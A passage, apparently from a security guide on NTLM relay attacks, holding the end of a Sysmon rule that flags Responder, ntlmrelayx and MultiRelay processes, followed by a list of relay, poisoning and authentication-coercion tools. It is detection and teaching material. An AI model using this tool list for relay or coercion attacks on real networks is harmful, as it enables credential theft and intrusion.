        <Image condition="contains">responder</Image>
        <Image condition="contains">ntlmrelayx</Image>
        <Image condition="contains">multirelay</Image>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```
🛠️ Tools
- Responder: LLMNR/NBT-NS/mDNS poisoner with rogue SMB/HTTP/other servers (turn those servers off when relaying)
- ntlmrelayx.py (Impacket): relay to SMB, LDAP(S), HTTP(S), MSSQL, IMAP, SMTP and RPC targets, with SOCKS mode
- MultiRelay.py (ships with Responder): SMB relay to a single target
- printerbug.py (krbrelayx) / SpoolSample: MS-RPRN authentication coercion
- PetitPotam: MS-EFSR authentication coercion
- nmap smb-security-mode, CrackMapExec/NetExec --gen-relay-list: find hosts that do not require SMB signing